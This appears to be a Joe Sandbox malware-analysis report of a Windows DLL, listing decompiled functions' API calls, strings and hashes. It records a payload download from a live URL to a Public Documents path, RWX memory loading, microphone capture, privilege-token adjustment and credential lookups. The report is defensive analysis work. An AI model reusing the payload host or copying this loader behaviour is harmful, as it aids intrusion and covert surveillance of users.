                                                  • String ID: DownloadApp$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt
                                                  • API String ID: 2470020359-224967001
                                                  • Opcode ID: 589eb7055f473983a5c73d51515f5a119968cbfe1b0e0dcbff1243ebfbe0ea12
                                                  • Instruction ID: f4075456ea2211239c32e77bee8ba72b102daa7ef1349c37812ad300117944eb
                                                  • Opcode Fuzzy Hash: 589eb7055f473983a5c73d51515f5a119968cbfe1b0e0dcbff1243ebfbe0ea12
                                                  • Instruction Fuzzy Hash: 1D41E439600315BBF220EB74DC89FDB37ECFB48B51F080619FE48A6191D674B9008B65
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,ResumeThread,00000000,?,00000000,7556F550), ref: 100015B9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100015C2
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateThread,?,00000000,7556F550), ref: 100015D2
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100015D5
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInOpen,?,00000000,7556F550), ref: 100015E5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100015E8
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInGetNumDevs,?,00000000,7556F550), ref: 100015F8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100015FB
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInPrepareHeader,?,00000000,7556F550), ref: 10001609
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000160C
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer,?,00000000,7556F550), ref: 1000161C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000161F
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInStart,?,00000000,7556F550), ref: 1000162F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001632
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CreateThread$KERNEL32.dll$ResumeThread$WINMM.dll$waveInAddBuffer$waveInGetNumDevs$waveInOpen$waveInPrepareHeader$waveInStart
                                                  • API String ID: 2574300362-1356117283
                                                  • Opcode ID: b16c15dad6be20392214e3733c7d2997f9670e9390d019f32002513cfd113147
                                                  • Instruction ID: 9f0f930b95cd2c35929b0060be92cf7d2e31dda6e2d7e4543e4cf746f9a0d286
                                                  • Opcode Fuzzy Hash: b16c15dad6be20392214e3733c7d2997f9670e9390d019f32002513cfd113147
                                                  • Instruction Fuzzy Hash: 97414CB5900308ABDB10EFA5DC88E9BBBA8EF89350F15095AFA4497201D739E545CBA1
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00000100), ref: 1000206D
                                                  • GlobalLock.KERNEL32(00000000), ref: 1000208C
                                                  • GlobalFree.KERNEL32(00000000), ref: 10002099
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Global$AllocFreeLock
                                                  • String ID:
                                                  • API String ID: 1811133220-0
                                                  • Opcode ID: 7b0ad0f25f4a2cddc16766b0e6d97ebd1ec4d88260b312a24f329dad41576865
                                                  • Instruction ID: 31745eacba11bb791e4eb93f153fa9c76b873c6e0b346c95d442a480799836a0
                                                  • Opcode Fuzzy Hash: 7b0ad0f25f4a2cddc16766b0e6d97ebd1ec4d88260b312a24f329dad41576865
                                                  • Instruction Fuzzy Hash: AB71C1B6610301ABD310CF54CC89F9AB3B4FF54714F569608E608AF2B1E3B4E549C7AA
                                                  APIs
                                                  • _access.MSVCRT ref: 100211E6
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1002121E
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 10021244
                                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt,?,?,00000001), ref: 10021276
                                                  • #825.MFC42(?,?,00000001), ref: 100212AC
                                                  • #825.MFC42(?,?,00000001), ref: 100212D9
                                                  • Sleep.KERNEL32(000000C8), ref: 100212E6
                                                  • CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\7.txt,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10021301
                                                  • MessageBoxA.USER32(00000000,1011F9D8,1011F9E8,00000000), ref: 1002131C
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10021328
                                                  • MessageBoxA.USER32(00000000,1011F9C4,1011F9E8,00000000), ref: 10021343
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 10021358
                                                  • MessageBoxA.USER32(00000000,1011F9B4,1011F9E8,00000000), ref: 10021375
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10021384
                                                  • CloseHandle.KERNEL32(00000000), ref: 10021394
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 100213AC
                                                  • CloseHandle.KERNEL32(00000000), ref: 100213EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@2@@std@@D@std@@FileMessageU?$char_traits@V?$allocator@$#825CloseHandleVirtual$?assign@?$basic_string@AllocCreateEos@?$basic_string@FreeGrow@?$basic_string@ReadSizeSleepV12@_access
                                                  • String ID: C:\Users\Public\Documents\MM\7.txt$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt$runas
                                                  • API String ID: 1859234541-2290419671
                                                  • Opcode ID: 33137425a6d22025152473852b37577924805ffe1fcf84fc13753eaa20bb0989
                                                  • Instruction ID: a423ea155a4f305ca4cd6c16e0ba3fae471ac5244e27810a6df4c9cfc6c4e3d5
                                                  • Opcode Fuzzy Hash: 33137425a6d22025152473852b37577924805ffe1fcf84fc13753eaa20bb0989
                                                  • Instruction Fuzzy Hash: E161F678A01658ABD714DFA89C49BDDBBB4FF25B10F540229F905F72C0C7745A44C764
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005335
                                                  • LoadLibraryA.KERNEL32 ref: 10005386
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005389
                                                  • LoadLibraryA.KERNEL32(?,IsValidSid), ref: 10005397
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000539A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: .23$2$3$ConvertSidToStringSidA$D$FreeLibrary$I$IsValidSid$L$_RasDefaultCredentials#0$LookupAccountNameA$P$V$kernel32.dll
                                                  • API String ID: 2574300362-2447002180
                                                  • Opcode ID: 0e49161b9a27eb155e0ea2c7e22d683dee310b1aad9c37f06d238c71156bed93
                                                  • Instruction ID: 223027d79037198c63e6ca2b5f055af27ccc184e3b8335a544396f1f5ed8738e
                                                  • Opcode Fuzzy Hash: 0e49161b9a27eb155e0ea2c7e22d683dee310b1aad9c37f06d238c71156bed93
                                                  • Instruction Fuzzy Hash: D631A472108385AED300DB68DC44AEFBFD8EFD5255F440A5EF58482241D7A9D60C8BB3
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1002C6B7
                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1002C6E8
                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1002C6F4
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1002C750
                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1002C758
                                                  • CloseHandle.KERNEL32(?), ref: 1002C76A
                                                  • FreeLibrary.KERNEL32(00000000), ref: 1002C77B
                                                  • FreeLibrary.KERNEL32(?), ref: 1002C786
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                  • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$kernel32.dll$Wu
                                                  • API String ID: 2887716753-1914032395
                                                  • Opcode ID: a14aad5105d2b35b6efed5fab13a5fa881ab0182d38bfdd77f0580a3c1bccf81
                                                  • Instruction ID: cdba08fcab1ab18a427d8be8ec3418e3e3881b817c76f5951e8ed3d00d165c74
                                                  • Opcode Fuzzy Hash: a14aad5105d2b35b6efed5fab13a5fa881ab0182d38bfdd77f0580a3c1bccf81
                                                  • Instruction Fuzzy Hash: 5B21B4716043456BD300DB75DC88FABBBE8EFC8654F444A1DF644A3140DB78E9448B66
                                                  APIs
                                                  • #354.MFC42(?,0000000C,?,?,?,?,?,?,00000000), ref: 10008140
                                                  • #5186.MFC42 ref: 1000815A
                                                  • #665.MFC42 ref: 1000816F
                                                  • #540.MFC42(?), ref: 1000818F
                                                  • #537.MFC42(?,?), ref: 1000819E
                                                  • #4204.MFC42(?,?), ref: 100081DA
                                                  • #2915.MFC42(00000080,?,?), ref: 100081EA
                                                  • #5442.MFC42(00000000,?,00000080,?,?), ref: 10008231
                                                  • #5572.MFC42(00000000,00000000,?,00000080,?,?), ref: 10008240
                                                  • #6874.MFC42(00000000,00000000,00000000,?,00000080,?,?), ref: 1000824B
                                                  • #4204.MFC42(00000000,00000000,00000000,?,00000080,?,?), ref: 10008254
                                                  • #2764.MFC42(00000000,00000000,00000000,00000000,?,00000080,?,?), ref: 10008262
                                                  • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 100082AA
                                                  • #1979.MFC42(00000000,?,0000000C,?,?,?,?,?,?,00000000), ref: 100082C2
                                                  • #800.MFC42 ref: 100082D0
                                                  • #800.MFC42 ref: 100082DE
                                                  • #665.MFC42 ref: 100082EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #4204#665#800$#1979#2764#2915#354#5186#537#540#5442#5572#6874Message
                                                  • String ID: $warning
                                                  • API String ID: 2155908909-2294955047
                                                  • Opcode ID: b7a10fa7eb8944d18d13460551dd7360e5263809a6bbceb2fc578ba8707b7c8b
                                                  • Instruction ID: b4b68b6e23a7d09b6ce465dfb8390c6dd5d130876c17849a93006b1a7f2b686e
                                                  • Opcode Fuzzy Hash: b7a10fa7eb8944d18d13460551dd7360e5263809a6bbceb2fc578ba8707b7c8b
                                                  • Instruction Fuzzy Hash: C751E0751087459BD348DF64D991B9BB7E1FF94710F800A2DF99693285DB30AE08CB92
                                                  APIs
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
                                                  • GetLocalTime.KERNEL32(?), ref: 1001E4CE
                                                  • sprintf.MSVCRT ref: 1001E599
                                                  • WriteFile.KERNEL32 ref: 1001E5EE
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001E5F5
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFileLibraryLoadProc$CloseCreateHandleLocalTimeWritesprintf
                                                  • String ID: $-$4$:$C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e$i$k$m$r
                                                  • API String ID: 694383593-1605913938
                                                  • Opcode ID: d024a1370f35b67469d2fddd4eadffe5950b14aad45106a9a881e02aa87f9513
                                                  • Instruction ID: 2097e82258319263d28a0c46b04399a4516b76f2585dd24dc8188860d4cfe16a
                                                  • Opcode Fuzzy Hash: d024a1370f35b67469d2fddd4eadffe5950b14aad45106a9a881e02aa87f9513
                                                  • Instruction Fuzzy Hash: 58516F7110D3C09EE311CB28C844B9BBFD5ABEA308F484A5DF5D967292C6B59608CB67
                                                  APIs
                                                    • Part of subcall function 10007940: #541.MFC42(?,?,?,10097D2B,000000FF), ref: 10007960
                                                    • Part of subcall function 10007940: #540.MFC42(?,?,?,10097D2B,000000FF), ref: 10007970
                                                  • #540.MFC42(?,?,00000000,00000065), ref: 10009F4E
                                                  • #540.MFC42 ref: 10009F5F
                                                  • #540.MFC42 ref: 10009F70
                                                  • #2614.MFC42 ref: 10009F81
                                                  • #860.MFC42(*.*), ref: 10009F8F
                                                  • #3811.MFC42(?,*.*), ref: 10009FB5
                                                  • #3811.MFC42(?,?,*.*), ref: 10009FC5
                                                  • #3811.MFC42(?,?,?,*.*), ref: 10009FD5
                                                  • #3811.MFC42(?,?,?,?,*.*), ref: 10009FE5
                                                  • #3811.MFC42(?,?,?,?,?,*.*), ref: 10009FF5
                                                  • #3811.MFC42(?,?,?,?,?,?,*.*), ref: 1000A005
                                                  • #860.MFC42(?,?,?,?,?,?,?,*.*), ref: 1000A033
                                                  • #2818.MFC42(?,*%s*,?,?,?,?,?,?,?,?,*.*), ref: 1000A04A
                                                  • #860.MFC42(?,?,00000000,00000065), ref: 1000A097
                                                  • #800.MFC42 ref: 1000A0D2
                                                  • #800.MFC42 ref: 1000A0E3
                                                  • #800.MFC42 ref: 1000A0F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #3811$#540$#800#860$#2614#2818#541
                                                  • String ID: *%s*$*.*
                                                  • API String ID: 185796673-1558234275
                                                  • Opcode ID: 6abb6b1f1cb9d99256978181ee2c38739354c8b016ba86206848d68570f9c942
                                                  • Instruction ID: ee2751bb99efb5b8e8624e7515bc667b61434bbdc0d3475f74e87a486019deaf
                                                  • Opcode Fuzzy Hash: 6abb6b1f1cb9d99256978181ee2c38739354c8b016ba86206848d68570f9c942
                                                  • Instruction Fuzzy Hash: 9B5146754083858FC325CFA4C591AABFBE5FFD9700F840A2DB59983292DB74A508CB63
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,SetEvent), ref: 10001329
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001332
                                                  • LoadLibraryA.KERNEL32 ref: 100013A4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100013A7
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(KERNEL32.dll,ResumeThread,00000000,?,00000000,7556F550), ref: 100015B9
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015C2
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateThread,?,00000000,7556F550), ref: 100015D2
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015D5
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInOpen,?,00000000,7556F550), ref: 100015E5
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015E8
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInGetNumDevs,?,00000000,7556F550), ref: 100015F8
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015FB
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInPrepareHeader,?,00000000,7556F550), ref: 10001609
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 1000160C
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer,?,00000000,7556F550), ref: 1000161C
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 1000161F
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInStart,?,00000000,7556F550), ref: 1000162F
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 10001632
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: F$KERNEL32.dll$O$S$SetEvent$W$a$b$c$g$j$l$n$o$r
                                                  • API String ID: 2574300362-1789360232
                                                  • Opcode ID: 8681ca1b1b33f73bda7f61c2a29eb6732c7a1b4a0c27a5eda15d591767e8de8a
                                                  • Instruction ID: 6d0500b828a3b4bacedf277e9e204f21e6ad90e68e93e0fee001a8a00f1ea147
                                                  • Opcode Fuzzy Hash: 8681ca1b1b33f73bda7f61c2a29eb6732c7a1b4a0c27a5eda15d591767e8de8a
                                                  • Instruction Fuzzy Hash: 7531C26110C3C08ED301DA6D9840B9BFFD59FA6658F090A9EE5C857343C6AAD61CC7BB
                                                  APIs
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,00000001,00000001), ref: 1000724A
                                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 100072B9
                                                  • GetFileAttributesA.KERNEL32(?), ref: 100072C9
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100072F2
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10007301
                                                  • malloc.MSVCRT ref: 1000730E
                                                  • ReadFile.KERNEL32(?,00000000,?,0000023D,00000000), ref: 10007335
                                                  • CloseHandle.KERNEL32(?), ref: 10007342
                                                  • free.MSVCRT ref: 10007378
                                                  • lstrlenA.KERNEL32(?), ref: 100073F9
                                                  • lstrlenA.KERNEL32(?), ref: 10007418
                                                  • lstrlenA.KERNEL32(?), ref: 10007427
                                                  • lstrlenA.KERNEL32(?), ref: 10007449
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10007457
                                                  • lstrlenA.KERNEL32(?), ref: 10007476
